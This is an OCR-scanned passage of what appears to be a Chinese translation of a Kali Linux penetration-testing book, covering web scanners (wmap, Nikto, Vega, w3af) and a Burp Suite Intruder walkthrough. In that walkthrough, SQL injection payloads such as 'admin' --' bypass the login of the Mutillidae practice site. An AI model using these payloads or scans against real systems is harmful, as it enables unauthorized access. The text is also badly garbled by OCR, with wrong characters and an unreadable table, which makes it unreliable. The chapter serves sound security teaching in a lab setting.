H-A AboutUs 77? 77? 
--[] ContactUs.aspx 200 34739 
-E BecomeASponsor 77? 7?? 
Ga Home ?7? 77? 
^"L] privacy. aspx 
由 -多 Portals 

Current speed: 0 requests/sec (Select and right click for more options) 


Average speed: (T) 6, (C) 0 requests/sec 


Parse Queue Size; 0 Current number of running threads: 20 


Total Requests: 2946/7935121 Chanosd 


Time To Finish: ~ 


Program paused! /portals/pl3/ 


图 9.5 ”使 用 DirBuster 强 力 分 析 网 站 结构 


另外 ， 也 可 以 直接 复制 一 个 网 站 到 测试 者 的 位 置 。 这 个 “克隆 网 站 ”人 允许 测试 人 员 轻 松 审查 本 地 文件 目录 结构 及 其 内 容 ， 提 
取 元 数据 ， 并 使 用 该 网 站 的 内 容 作为 程序 的 输入 ， 如 crunch， 这 将 产生 一 个 个 性 化 的 词 库 来 支持 密码 破解 。 


要 哆 隆 一 个 网 站 到 本 地 系统 ， 可 使 用 HTTrack。 如 果 它 不 在 Kali 中 ， 可 以 使 用 apt-get 命 令 下 载 ， 在 命令 提示 符 下 输入 
httrack 并 按 回 车 键 。 系 统 将 提示 选择 存储 下 载 网 站 的 目录 位 置 。 一 旦 运行 程序 ， 你 将 有 目标 网 站 的 备份 。 


如 果 你 已 经 映射 网 站 或 网 络 服务 的 基本 结构 ， 那 么 杀 链 的 下 一 个 阶段 束 是 确定 可 被 利用 的 漏洞 。 


9.2 iae 


使 用 目 动 化 工具 扫 摘 漏洞 可 能 会 产生 问题 。 网 络 漏洞 扫 拉 器 具有 所 有 扫 摘 器 的 共同 缺点 ( 扫 摘 器 只 能 检测 已 知 漏 洞 的 签名 ， 
它们 不 能 确定 一 个 漏洞 实际 上 是 否 还 可 以 被 利用 ;， 还 有 束 是 假 阳性 的 报告 友 病 率 很 高 ) 。 此 外 ， 网 页 漏洞 扫 摘 器 不 能 识别 业务 逻 
辑 的 复杂 错误 ， 它 们 没有 准确 地 模拟 黑客 所 使 用 的 复杂 链接 攻击 。 


在 努力 提高 可 靠 性 方面 ， 许 多 渗透 测试 者 使 用 多 种 工具 扫描 Web 服 务 ; 当 多 个 工具 同时 报告 可 能 存在 一 个 特定 的 漏洞 ， 这 
样 的 共识 将 直接 驱使 测试 者 手动 验证 漏洞 是 否 存 在 。 


Kali 针 对 Web 服 务 配 有 大 量 漏洞 扫 拉 器， 并 为 安 委 新 的 扫 摘 仪 和 扩展 其 能 力 提供 了 一 个 称 定 平 台 。 这 融 允 许 渗透 测试 人 员 通 
过 选择 扫 搞 工具 来 提高 测试 的 有 效 性 : 


最 大 限度 的 完整 性 《〈 漏 铜 发 现 的 总 数 ) 和 测试 精度 (这 是 真实 的 ， 没 有 假 阳 性 结果 的 漏洞 〉。 
尽量 减少 所 需 的 时 间 ， 以 获得 可 用 的 结 末 。 


尽量 减少 对 被 测试 网 络 服务 的 负面 影响 。 这 包括 由 于 流量 的 增加 而 使 系统 反应 变 慢 。 例 如 ， 最 第 见 的 负面 影响 之 一 古 测 试 结果 的 形式 ， 输 入 
a 然后 通过 电子 邮件 有 发送 ， 一 个 人 提供 了 一 个 已 经 发 生 更 新 变化 的 系统 ， 不 受 控制 的 测试 结果 形式 ， 可 以 导致 发 送 超过 30000 封 
! 


选择 最 有 效 的 工具 是 非 剃 复杂 的 。 除 了 已 经 列 出 的 因素 ,一些 漏洞 扫描 器 也 具有 相应 的 漏洞 利用 和 支持 后 期 漏洞 活动 的 功 
能 。 对 于 我 们 而 言 ， 我 们 会 考虑 所 有 工具 ， 扫 摘 可 利用 的 弱点 是 “漏洞 扫 朱 ”。 Kali 提 供 几 种 不 同 的 漏洞 扫描 器 ， 主 要 如 下 : 

-扫描 器 扩展 了 传统 的 漏洞 扫描 程序 的 功能 ， 包 括 网 站 和 关联 服务 (Metasploit 框 架 和 Websploit) . 

-扫描 器 拓展 了 非 传 统 的 功能 应 用 ， 如 Web 浏 览 器 ， 支 持 Web 服 务 漏洞 扫描 (OWASP Mantra) . 


-扫描 器 是 专门 开发 用 于 文 持 对 网 站 和 网 页 服务 的 侦察 和 利用 检测 (Arachnid、Nikto、Skipfish、Vega、w3af 等 ) 。 


9.2.1 扩展 传统 漏洞 扫 摘 器 功能 


这 种 类 型 的 漏洞 扫描 器 的 最 好 例子 是 wmap 模 块 ， 与 Rapid7 的 Metasploit 框 架 封装 在 一 起 。 使 用 这 个 模块 ， 首 先 你 必须 确 
保 PostgreSQL 数 据 库 服务 已 启动 ， 命 令 如 下 : 


root@kali:-# service postgresql start 


其 次 ， 从 命令 提示 符 启 动 msfconsole， 并 输入 load wmap 命 令 。 像 大 多 数 框架 应 用 程序 一 样 ， 在 命令 提示 符 下 输入 help 
或 -h， 将 显示 可 供 使 用 的 命令 。 


要 管理 目标 网 站 ， 使 用 wmap_sites 命 令 。-a 选 项 将 向 应 用 程序 的 数据 库 中 添加 目标 的 IP 地 址 。-1 选 项 提供 一 个 对 目标 网 站 
测试 可 用 的 位 置 列表 ， 如 图 9.6 所 示 。 


[WMAP 1.5.1] === et | J] metasploit.com 2012 
Successfully loaded plugin: wmap 
maf > wmap sites -a http://54.236.190.114 
"| Site created. 
msf > wmap sites -l 
Available sites 


Id Host Vhost Port Proto # Pages # Forms 


0 24.236.190.114 534.736.190.114 80 http 0 0 


图 9.6 使 用 wmap_sites 命 令 
通过 选择 目标 ， 测 试 人 员 现 在 能 够 使 用 下 面 的 命令 运行 wmap 模 块 : 


msf> wmap run -e 


图 9. 7 显示 上 述 命 令 ~ 的 执行 结果 。 


msf > wmap run -e 
| Using ALL wmap enabled modu.es. 
] NO WMAP NODES DEFINED. Executing Local modules 
| Testing target: 
| Site: 594.236.190.114 (54.236.190.114) 
| Port: 80 SSL: false 
[^] Testing started. 2013-12-26 15:25:09 -0300 
“| Loading wmap modules... 
[* | 39 wmap enabled modules Loaded. 
[*] 
-[ SSL testing ]- 
[*] Target is not SSL. SSL modu.es disabled. 
[^] 
-[ Web Server testing ]- 


[^ 
L7 
[^ 
L- 
|" 


[*] Module auxiliary/scanner/ht-p/http version 


54,236,190.114:80 

Module auxiliary/scanner/ht-p/open proxy 
Module auxiliary/scanner/ht-p/robots txt 
Module auxiliary/scanner/ht-p/frontpage login 


a i i a 
— .Bli— 88 — M - —— 


图 9.7 4& f] wmap tun - e 命 令 


执行 此 命令 ,可 能 需要 一 些 时 间 来 完成 (这 取决 于 网 站 中 的 页 面 数 ， 网 站 的 结构 复杂 性 ， 以 及 检测 安全 漏洞 的 模块 操作 方 
I) a 


Metasploit 框 以 并 不 是 为 复杂 的 网 站 和 Web 服 务 设计 的 。 本 产品 与 专 为 网 站 和 Web 服 务 设计 的 漏洞 扫 摘 器 相 比 ， 结 果 数 量 
受到 了 限制 。 然 而 ， 因 为 它 总 是 处 于 更 新 ， 所 以 值得 监测 其 扫描 能 力 的 变化 。 


该 Websploit 应 用 程序 也 使 用 wmap 模 块 。 


9.2.2 扩展 Web 浏 览 器 功能 


Web 浏 网 器 是 为 与 网 络 服务 交互 而 设计 的 。 它 们 被 选择 作为 易 受 到 攻击 评估 和 利用 的 工具 是 自然而然 的 事 。 


这 种 类 型 的 工具 的 最 好 的 例子 是 OWASsP 的 Mantra， 一 个 基于 Firefox 浏 览 器 上 的 第 三 方 安全 实用 程序 的 集合 。OWASP 的 
Mantra 支 持 Windows、Linux 和 Macintosh 的 测试 系统 ， 并 提供 了 支持 以 下 活动 的 实用 访问 : 


-信息 采集 (information gathering) : 这 些 工具 提供 被 动 侦察 ， 报 告 目标 的 物理 位 置 ， 揭 露底 层 的 站 点 技术 和 搜索 网 站 的 超 链接 测 
试 。 


编辑 器 (editors) : 实用 编辑 程序 的 集合 ， 编 辑 、 调 试 、 监 控 HTML、CSS 和 JavaScript。 


.代理 (proxy) : 提供 代理 管理 工具 ， 包 括 EoxyProxy， 一 个 便于 在 代理 之 间 来 回 切换 的 工具 。 


-网络 实用 工具 (network utilities) :这些 工 具 为 客户 提供 FTP 和 SSH 通 信 ， 并 简化 DNS 缓存 管理 。 


-应 用 审计 (application auditing) : 各 种 用 户 代理 之 间 的 切换 ， 访 问 Web 开 发 工具 ， 控 制 每 个 站 点 的 HTTP 连 接 发 送 ， 发 现 SOL 注 
入 ，XSS 漏 洞 ， 允 许 测 试 人 员 算 改 数据 ， 以 及 访问 Websecurify 工 具 。 


-其 他 (miscellaneous) : 生成 脚本 ， 会 话 管理 和 下 载 ， 以 及 访问 加 密 、 解 密 和 散 列 标签 功能 
该 Mantra 框 架 可 用 于 促进 对 网 站 的 半自动 化 侦察 。 


在 图 9.8 中 ，Mutillidae 登 录 页 面 已 在 Mantra 浏 览 器 中 打开 。 使 用 下 拉 菜 单 (右上 角 激活 蓝 色 标识 ) 时 ，SQL 注 入 Me 应 用 
的 申请 一 一 已 选 自 可 用 的 工具 中 ， 并 显示 在 左 侧面 板 。 


OWASP Mantra lsc a x 

j| V httgi19216 agesisgnpho x ER m ) 

€ + H- 1 192.168.759.129 /mutillidee/index php?pageslogn php EE eBay ac if gc fi * 

"*SOLiN«tMe SSX [TI 23 

* ex Mutillidae: Born to be Hacked 

z | ; | | ! 

- SQL Inj ject Me 

. SOL Inject Me Lets you test the page yt 

** SOL Injection vulnerabilities. 

"W Each tab represents a form on the page 

Ub fields. Just fill in good values for all 

& which ones are to be tested (they will l a 

p Sec ame Tere A atc 

Test all forms with all attacks Name | o  ] 

@ Test all forms with top attacks — Password | M 

© egt 


Erneut Run all tests - 


Dent have an account? Please register here 


lagin-php-&ubmit-butten 
O Login i 


pasiwonrd 


[] Charge thee Lo the value you w 


ume Tur al 
LJ 


图 9.8 ”使 用 Mantta 打 开 Mutillidae 登 录 页 面 


9.2.3 具体 网 上 各 服务 的 漏洞 扫 摘 器 


漏洞 扫 摘 器 是 目 动 运行 的 应 用 程序 ， 也 是 确定 已 知 漏洞 签名 的 工具 ，。 


Kali 附 带 了 几 个 预 安装 的 漏洞 扫描 器 ; 可 以 通过 导航 访问 依次 选择 Kali Linux|Web Applications|Web Vulnerability。 渗 透 
测试 者 通 弟 会 使 用 两 个 或 三 个 全 面 扫 摘 仪 对 同一 目标 扫 摘 ， 以 确保 有 效 的 结果 。 需 要 注意 的 是 一 些 漏 洞 扫 摘 器 也 包括 攻击 的 功 


eb 
Abo 


漏洞 扫 摘 器 是 很 “ 嘲 洒 ”的 ， 并 且 通 弟 是 由 受害 人 检测 。 然 而 ， 作 为 冲 规 的 跨 互 联网 痛 景 探 索 的 一 部 分 ， 扫 摘 经 家 忽略 。 
事实 上 ， 一 些 攻击 者 已 经 知道 通过 友 动 大 规模 扫 摘 ， 针 对 目标 作伪 委 真 实 的 攻击 ， 或 者 诱 使 防护 者 茶 用 检测 系统 ， 以 减少 他 们 必 
须 管理 的 报告 的 数量 。 


表 9.1 为 最 重要 的 漏洞 扫 摘 器 的 快速 回顾 。 


表 9.1 重要 漏洞 扫描 器 
w FA Ti Y^ 
Arachnid 一 个 开源 的 Ruby 框架 ， 分析 扫描 接收 到 的 HTTP 啊 应 ， 并 且 消 除 误 报 的 HTTP 啊 应 
GoLismero EW Web 应 用 程序 ， 并 且 检 测 常 见 的 漏洞 。 结 果 可 以 保存 为 TXT、CVS、HTIML 和 RAW 格式 
Skin 一 个 基于 Perl 的 开 "n dpi fo VT HERE IDS 以 及 用 方才 aR Ate; 然而 ， 这 种 “原生 态 ” 的 网 络 
扫 摘 蒂 开 妨 跟 不 上 形势 友 展 ， 疫 有 一 些 现代 的 扫 摘 薪 准 硼 
Skipfish - PURT- HS fare 2c JN s VH a AE T FEA, P^^E Een i ei m LAS, EE MS EP ded 4-308 
di rn LEE 
T-- 它 是 一 个 基于 GUI 的 开源 汤 润 扫描 器 。 因 为 它 是 用 Java 编写 的 ， 所 以 是 路 平台 的 (Linux 操作 系统 、 
OS X All Windows), JFASLI Ae X. 
waat | x FEM a fin BEDA 六 图 形 和 命令 行 两 种 界面 接口 ， 蚌 一 个 综合 的 Python WESCE fr. EUM B RIS 
IFAT = atin ALFA Rapid7 收购 ， 所 以 未 来 会 与 Metasploit HEA 5S 25 415 I, 
Wapiti 它 是 一 修 基 于 Python AY IF is iil tis 
wanes 这 下 一 lg 基于 Java 的 框 染 ， 用 于 分 析 HTTP HI HTTPS HiX. EA LAE AT RE Bel GG 
Allied LAY than T 4 Fi as 
Webshag 这 是 一 个 基于 Python AY) HEREA, P AAAS AER IDS Skib 
Websploit 这 是 为 有 线 和 无 线 网 络 准备 的 攻击 框架 
大 多 数 测试 者 开始 测试 一 个 网 站 时 都 使 用 Nikto， 这 是 一 个 简单 的 扫 摘 器 (特别 是 有 天 结果 报告 ) ， 通 音 提 供 人 准确 但 有 限 的 


结果 。 这 种 扫 摘 的 一 个 样本 输出 显示 如 图 9.9 所 示 。 


一 步 是 使 用 更 先进 的 扫 摘 器 扫 摘 大 量 的 漏洞 ;相对 来 况 ， 它 们 可 能 需要 更 长 的 时 间 来 完成 。 
(如 确定 被 扫 摘 的 网 页 的 数目 ， 也 残 是 网 站 的 复杂 性 ， 可 能 


Apo 
有 6 元 


据 库 收集 数据 ) ， 需 要 数 天 才 


一 种 基于 验证 友 现 漏洞 数量 的 、 最 有 效 的 扫描 器 是 Subgraph Vega。 如 图 9.10 所 示 , E 


中 、 低 或 信息 。 为 了 得 到 特别 的 结果 ， 访 测试 仪 能 够 点 击 确 


复杂 的 漏洞 扫 摘 是 不 寻 冲 的 
包含 多 种 页 面 ， 允 许 用 户 输入 ， 如 搜索 功能 或 表单 ， 从 用 户 的 后 人 台数 


会 扫 摘 目标 ， 并 将 漏洞 分 级 为 高 、 


定 结果 为 “drill down" GRA) 。 该 测试 仪 还 可 以 修改 搜索 模块 ， 


这 是 用 Java 编 写 的 ， 专 注 于 特定 的 漏洞 或 找 出 新 的 安全 漏洞 。 


另外 值得 使 用 的 扫描 器 是 Web 应 用 程序 攻击 和 审计 框架 (Web Application Attack and Audit Framework, w3af) , 
个 基于 Python 的 开源 Web 应 用 程序 安全 扫 描 器 。 它 提供 预 配置 的 漏洞 扫描 ， 以 支持 诸如 OWASP 标 准 。 使 用 扫 摘 器 的 过 多 选项 


是 有 代价 的 ， 它 需要 的 时 间 明 显 长 于 其 他 扫 摘 器 审理 目标 的 
的 完整 审计 w3af 实 例 ， 如 图 9.11 所 示 。 


时 间 ， 并 且 在 很 长 的 测试 时 间 中 ， 很 容易 出 现 故障 。 配 置 为 样本 网 站 


rootükali:-4 nikto -h 192.168.43.129 
- Nikto v2.1.5 


LE NE =E = 2 2 M EE E EE M M M M 1 M EE 1 21 1 M 2 E&E 1 1 1 2 M 20 2 E 1 2 21 1 1 1 Q1 M 1 1 1 212 1 1 1 1 M 1 1 M 21 1 1 2121 Se M M 1 1 2 1 21 M1 1 2 1 21 1 > M 


Target IP: 192.168.43.129 


+ 

+ larget Hostname: 192.168 .43.129 

+ Target Port: 80 

+ Start Time: 2013-12-25 17:39:23 (GMT -5) 


+ Server: Apache/2.2.8 (Ubuntu) DAV/2 

+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.10 

+ [he anti-clickjacking X-Frame-Options header is not present. 
+ 

e 


Apache/2.2.8 appears to be outdated (current is at least Apache/2.2.22). Apach 
1.3.42 (final release) and 2.0.64 are also current. 
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microso 
ft.com/en-us/library/eB8zOülxdh*28VS.809$29.aspx for details. 
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to X 
ST 
+ OSVDB-3233: /phpinfo.php: Contains PHP configuration information 
+ DSVDH-1?I84: /index .php ?=PHPRARSF AG -3C92-11d4-AS3A9-4C /RORCTOG0G: PHP reveals 
potentially sensitive information via certain HTTP requests that contain specifi 
c QUERY strings. 
+ OSVDB-3092: /phpMyAdmin/changelog.php: phpMyAdmin is for managing MySQ. databa 
ses, and should be protected or limited to authorized hosts. 
+ Cookie phpMyAdmin created without the httponly flag 


图 9.9 ”使 用 Nikto 测 试 网 站 


subgraph Vega 
Fila Scan Window Help 
eos 


CB Website View 


P &:1292.158.43.123 
b @192.168,56.101 
I scan PRUNUS © Oo FE 7H http://182.168.43. 129/twiki/binfview/lpts 
49? out af 1227 scanned (40. 1%) 
- © 12/26/2013 16.22.41 [Auditing] (804) -一 


v EÒ nttp.//192.168.23.129 (804) 


b High (14 7] Scan Alert Summary 

P @ Medium (154) 

b @Low (145) — — 
b @ into (363) 


Session Cookia Without Secure Flag 
Session Cookie Without HttaO nly Flag 
Cleartext Password over HTTP 

Cross Site Scripting 

Local File include 


Page Fingerprint Differential Detected - 
Possible XPath Injection 

SGL Injection 

shell injection 


图 9.10 使 用 Subgraph Vega I 2f 77] 


Kali 还 包括 一 些 特殊 应 用 的 漏洞 扫描 器 。 例 如 ，WPScan 是 专门 用 于 WordPress CMS 应 用 的 。 


waat = Web Application Attack and Audit Framework 


Profiles Edit View Tools Configuration Help 


+ | d» | &|G 


Profiles 


empty. profile Plugin | Active 


OWASP TOP10 b. audit E 
audit. high. risk |. suth [7 
bruterorea ? bruteforce 
Fast_scan ? discovery E 
full-audit > evasion L] 
full audit rmanual.. disc. > 
i re [=] 
harii Jrep This profile performs a full audit of the target 
P ? mangle C] 


website, using only the webSpider plugin for 


web _intrastructure Y RLW VS 
EIE discovery. 


Plugin | Actüve 


> output 加 


图 9.11 使 用 w3af 审 计 


9.3 ”使 用 客 尸 器 代理 测试 安全 性 


不 同 于 目 动 漏洞 扫描 器 ， 客 尸 端 代理 为 了 增加 有 效 性 ， 需 要 大 量 人 工交 互 。 一 个 客 尸 端 代理 拦截 HTTP 和 HTTPS 流 量 ， 人 允许 
漏洞 测试 者 检查 用 尸 和 应 用 程序 之 间 的 通信 。 它 允许 测试 者 复制 数据 ， 或 友 送 请 求 与 应 用 进行 交互 。 


Kali 带 有 几 个 客户 端 代理 ， 包 括 Burp Suite, OWASP ZAP、Paros、ProxySstrike， 漏 洞 扫描 器 Vega 和 Webscarab。 经 过 
广泛 测试 ， 我 们 已 经 开始 依赖 Burp 代 理 ， 将 ZAP 作 为 一 个 备份 工具 。 


Burp 主 要 用 于 拦截 HTTP (S) 流量; 然而 ， 这 是 一 个 更 大 的 工具 套件 ， 具 有 几 个 附加 功能 ， 其 中 包括 的 一 部 分 如 下 : 


EH RAR A FEITH A o 


漏洞 扫描 器 ， 包 括 序 列 发 生 器 ， 以 测试 会 话 令 牌 的 随机 性 ， 并 转发 操作 和 重新 发 送 客户 端 与 网 站 之 间 的 请 求 〈Kali 中 打包 的 Burp 代 理 的 免 
避 版 不 包含 漏洞 扫描 程序 中 ) 。 


m cues 可 以 用 来 发 动 自 定 义 的 攻击 (Kali 中 包含 的 免费 版 本 的 工具 的 速度 会 受到 限制 ， 如 果 你 购买 了 软件 的 商业 版 本 ， 将 不 受 这 些 
l|) o 


能够 编辑 现 有 的 插件 或 写 新 的 插件 ， 以 扩展 可 以 使 用 的 攻击 的 数量 和 类 型 。 


要 使 用 Burp， 确 保 你 的 Web 浏 多 器 配置 为 使 用 本 地 代理 ;通常 情况 下 ， 你 需要 调整 网 络 设置 ， 来 指定 HTTP 和 HTTPS 流 量 必 
须 在 本 地 主机 (127.0.0.1) 的 端口 8080 使 用 。 


设置 浏览 器 和 代理 一 起 工作 后 ， 手 动 映射 应 用 程序 。 通 过 关闭 代理 拦截 ， 然 后 浏览 整个 应 用 程序 可 以 完成 这 一 步 。 按 照 每 一 
个 环节 ， 人 好 交 表 格 并 登录 到 该 网 站 尽 可 能 多 的 领域 。 从 不 同 的 响应 ， 可 以 推断 出 一 些 额外 的 内 容 。 站 点 地 图 将 填 序 Target 选 项 
卡 内 的 区 域 (自动 爬行 也 可 以 使 用 鼠标 右键 单 击 该 网 站 ， 并 选择 Spider This Host; 然而 ， 手 工 技术 给 测试 者 提供 了 一 个 深入 了 
解 目 标的 机 会 ， 并 且 它 可 以 识别 要 避免 的 区 域 ) 。 


一 旦 目标 被 映射 ， 通 过 选择 站 点 地 图 中 的 分 支 来 定义 目标 -学 围 ， 并 使 用 Add to Scope 命 令 。 一 旦 完成 ， 你 可 以 使 用 显 
滤器 隐藏 在 站 扣 地 图 上 不 感 兴趣 的 项 目 。 目 标 网 站 创建 的 站 点 地 图 如 图 9.12 所 示 。 
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Burg, in Intruder forpmaster ‘Window Hein 
Tanget.| Proxy | Spider Scanner | intrager [^ eater | Sequencer | Dareder | [comparer opt s | Alerts 
ep em | 四 = a 


per Hiding Fe "m mum end net feud "— hadi ess. image and wem Venus content: hiding. pua Nepabsk hiding MN fede LEE f iN | 
ito: tidigitaldefence co | Most | Method | URL | Params | Stat. | Comment | Time requ... | m 
(e Wip lidigi&aldelence 08257 businesscatahst com tp Lidigitaldefence ca GET J - : A Mp ) 388738 WT nu. — Horis ml 
hetp.fídigitaldefenxe.ca GET iBxisLang/validation . 01-03. 35 5. | | 
http peitaldelarna th CET iCataheticriptajava LJ 708 3575 script 51053 33 F 
he didigitaldefence.ca GET fCatabyst5cripta/val ， a 200 7614 script 01:.053:35 人， 
hip: Fédigitaldelwnce ca GET PCi- app-a get arnank "| 706 lTR54 HTML PCI Gap Auseuarnam 5204 34 1 
hetp./í/digitaldefence co. GET fResources/Eesources g i06 12852 HTML Digital Defence Rese 61-03-56 5 
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hitp: //digibaldeiente ca GET fira ren atiam peg unity Ll 700 17844 HTH inhorm ation Security 0104 28 F 
http dipitalityferce ca GET finformation-securnity,.. g 206 15439 HTML information Security. 01:03. 35 5. 
hip Iidigitaldelenee ca GET fabio rrm atiam «ac unity Li 70ò 21128 — HTML information Seturiby 010324337 | 
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| Host: digitaldefence.ca a 
User-Agent: MozilayS.6 (X11; Linum x86 64; rv-22.0) Gecko/20100101 Fwrefox/22.0 Iceweasel/22.0 
Accept: text/html. applcation/xhtrni mnl apphe ation/urni:qe 0 9,*/*:32 0.8 
Accept-Language: en-US.en;q« 0.5 
Accept-Encoding: gap, deflate 
Connection: krep-aleve 


A912 ”目标 网 站 创建 的 站 点 地 图 


一 旦 拒 虫 任务 完成 ， 人 工 检 查 的 目录 和 文件 列表 不 是 公共 网 站 的 一 部 分 ,或 无 意 中 公开 出 现 的 任何 结构 ， 例 如 ， 目 录 名 为 管 
理 、 备 份 、 文 档 ， 或 笔记 ， 都 应 进行 人 工 审 坦 。 


手动 测试 使 用 单 引 号 作为 输入 产生 错误 代码 的 提示 ， 它 可 能 是 一 个 容易 受到 SQL 注 入 攻击 的 登录 页 面 ， 错 误 代 码 的 样本 返回 
显示 ， 如 图 9.13 所 示 。 


Failure is 3 always an option and this situation proves it 


?EfFüF EXPELEIPID € query: Yau naea an error in your rSoL EUREEN: ‘cheek tHe. 


Message manual that corresponcs to your MySQL server version for the right syntax 
‘to use near " AND password-" at line 1 
poo Trace — 40 Nariwwwimutlidaen den .phP(9G) include 41 (man) |. 
Diagnotic i 


下 EI ens 
Information : 'SELECT FROM accounts WHERE username=" AND password- 


息 


图 9.13 ”返回 错误 信 


代理 的 真正 实力 在 于 它 截获 并 修改 命令 的 能 力 。 在 这 个 特殊 的 例子 中 ， 我 们 将 使 用 Mutillidae 网 站 (—^ 228873 
Metasploitable 测 试 框 架 的 一 部 分 的 “破碎 ”站 点 ， 以 绕 过 SQL 注入 的 认证 ) 。 


要 上 友 动 这 种 攻击 ， 确 保 Burp 代 理 配置 拦截 通信 ， 转 到 Proxy 标 签 ， 再 选择 Intercept (拦截 ) TANF. Faclntercept is 
on 按钮 ， 如 图 9.14 所 示 。 准 备 工 作 完 成 后 ， 打 开 浏览 器 窗口 ， 并 通过 输入 <1P 
address» /mutillidae/index.php? page=login.php， 访 问 Mutillidae 登 录 页 。 输 入 用 户 名 和 密码 ， 然 后 点 击 登录 按钮 。 


如 果 你 返回 Burp 代 理 ， 将 会 看 到 该 用 户 输 入 到 网 页 上 的 表格 中 的 信息 被 截获 。 


Burp Suite Free Edition v1.5 


Bure Intruder Repeater Window Help 


(rare: fgg spee [scanner [mira [Repeater | seavencer [Decoder [Comparer [Ontons [mers] —— 
fee rst [ ontons | 


—— to TON AURI 168.75.125:80 


— 


POST jmutillidaefindex. php?page- login. php HTTP/1.1 

Host: 192.168.75.129 

User-Agent: Mozilla/5.0 (X11; Linux x86 64; rv:22.0) Geckc/20100101 Firefox/22.0 Iceweasel[22.0 
Accept: text/html,application/xhtrnl--xml.application/xml;q- 0.9,*[*;q— 0.8 
Accept-Language: en-US,en;q- 0.5 

Accept-Encoding: gzip, deflate 

Referer: http://192.168.75.129/mutillidaes/index.php?page=login.php 
Cookie: PHPSESSID- 986c866e8lfe310f6e24a6ce4b4df55a2 

Connection: keep-alive 

Content-Type: application/x-www-form-urlencoded 

Content-Length: 55 


username=%27&password=%27&login-php-submit-button=Login 


A914 Burp 拦 截 的 信息 


单 击 Action 按 钮 ， 并 选择 Send to Intruder (发 送 到 入 侵 者 ) 选项 。 打 开 主 Intruder 选 项 卡 ， 你 会 看 到 4 个 子 项 : Target, 
Positions、Payloads 和 Options， 如 图 9.15 所 示 。 如 果 选 择 Positions， 你 会 看 到 来 自 截 获 的 信息 的 5 个 有 效 载 傈 的 位 置 。 


这 种 攻击 将 使 用 Burp 代 理 的 狙击 手 模式 ， 同 时 ， 从 由 测试 仪 提供 的 列表 中 选取 单一 输入 表单 ， 同 时 ， 友 送 设 输 入 到 一 个 单 
一 的 有 效 载 休 位置。 在 这 个 例子 中 ， 我 们 的 目标 是 用 户 名 字段 ， 它 是 我 们 基于 返回 的 错误 信息 怀疑 的 漏洞 所 在 。 


定义 有 效 载 集 的 位 置 ， 我 们 选择 子 标签 的 Payloads 选 项 ， 如 图 9.16 所 示 。 


为 了 友 动 攻击 ， 从 顶部 的 菜单 选择 Intruder， 然 后 选择 Start Attack。 代 理 将 遍历 单词 表 ， 对 选 定 的 有 效 载 倚 位 置 作为 合法 
的 HTTP 请 求 ， 它 将 返回 服务 器 的 状态 代码 。 正 如 你 可 以 在 图 9.17 中 看 到 的 ， 大 多 数 选 项 生产 200 (请 求 成 功 ) 的 状态 代码 ; 然 
而 ,一 些 数 据 返 回 的 是 302 (请 求 找 到 ;表明 所 请 求 的 资源 目前 位 于 不 同 的 URI 下 ) 的 状态 代码 。 


Burp Suite Free Edition v1.5 
Burp Intruder Repeater Window Help 


Payload Positions 


Configure the positions where payloads will be inserted into the base request. The attack type determines the way in 


Attack type: | Sniper 


POST /mutilidae/index.php?page=§ 

Host: 192.158.753.129 

User-Agent Mozilla/5.0 (X11; Linux x86 84; rv:22.1) Gecko/20100101 Firefox/22.0 Iceweasel/22.0 
Accept: text/html,application/xhtmlJ-xml,application/xml;q- 0.9,*/*;q— 0.8 
Accept-Language: en-LS,en;q- 0.5 

Accept-Encoding: gzip. deflate 

Referer: http://192,168.75.129/mutillidae/index.phs?page=login.php 
Cookie: PHFSESSID= 

Connection: keep-alive 

Content-Type: application/x-www-form-urlencoded 

Content-Length: 55 


username=§e27§&password=§%27§&login-php-submit -button=§Degins 


图 9.15 Intruderiż m -F 
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四 | Payload Sets 


You can define one or more payload sets. The number of payload sets depends on the attack type defined in the F 
can be customized in different ways. 


| Sequencer | Decoder 


| Repeater 


Scanner Lintrude 


Payload set: 


Payload type: Reques- count 25 


Payload count 5 


(?) Payload Options [Simple list] 


This payload type lets you configure a simple list of st-ings that are used as payloads. 


admin' - 
admin' # 
lzl 
1=1-- 
1=1# 


Add from list ... [Pro version only] 


A916 ”选择 Payloads 选 项 


25840 baseline request 


0 ü s 
1 1 admin' - 200 国 国 22121 
2 1 admin' # 200 i LJ 22116 
3 1 121 200 LJ LJ 22095 
4 1 1=1- 200 @ 22106 
5 1 l=1# 200 tJ LJ 22096 
5 2 admin 200 LJ LJ 25506 
J 2 admin’ # 200 e LJ 23906 
ü 2 1-1 200 = [EJ 27308 
9 2 l=1-- 200 m LJ 27308 
10 2 l=1# 200 LJ LJ 2730B 
admin' # 302 td LJ 25911 
1-1 200 网 A 27970 


POST /mutillidae/index.php?page=login.php HTTP/1.1 

Host: 192.168.735.129 

User-Agent: Mozilla/5.0 (X11; Linux x86 64; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0 
Accept: text/html,applicatian/xhtml--xml,application/xml;q- 0.9 ,*/*:;q— 0.8 
Accept-Language: en-U5,en;q- 0.5 

Accept-Encoding: gzip, deflate 

Referer: http://182.168.75.128/mutillidae/index.php?page- lcgin.php 
Cookie: PHPSESSID=S86c86e8tte3 1l0t6e24a6ce4b4dis5a2 

Connection: close 

Content-Type: application/x-www-form-urlencoded 

Content-Length: 62 


username=admin'%20-&password=%27Glogin-php-submit-button=Lagin 
A917 攻击 返回 的 状态 代码 
出 现 302 状 态 表示 攻击 成 功 ， 并 且 所 获得 的 数据 可 以 用 来 成 功 登 录 到 目标 位 置 。 


不 竹 的 是 ， 对 Burp 代 理 及 其 功能 的 概述 实在 太 简 单 。Kali 中 的 免费 版 Burp 可 以 满足 许多 测试 任务 ; 然而， 严谨 的 测试 者 
(和 攻击 者 ) 应 该 考虑 购买 商业 版 本 。 


9.4 ”服务 器 漏洞 

因为 服务 器 有 广泛 的 “ 受 攻击 面 ” (通信 信道 、 客 尸 端 软件 、 服 务 器 操作 系统 、 应 用 程序 、 中 间 件 和 后 台数 据 库 ) ，Web 
服务 很 容易 受到 多 种 攻击 类 型 的 威胁 。 本 书 不 讲述 所 有 可 能 的 攻击 学 围 ， 我 们 只 展示 突出 Kali 能 力 的 几 个 类 型 。 

在 这 个 例子 中 ， 我 们 将 演示 Kali 如 何 友 动 针对 网 络 服 务 器 的 拒绝 服务 (DoS) KE. 


在 一 般 情 况 下 ， 攻 击 提供 Web 服 务 的 主机 系统 的 操作 系统 ， 应 遵循 乙 前 朱 述 的 方法 ; 然而 ， 它 们 的 结构 特别 容易 受到 DoS 
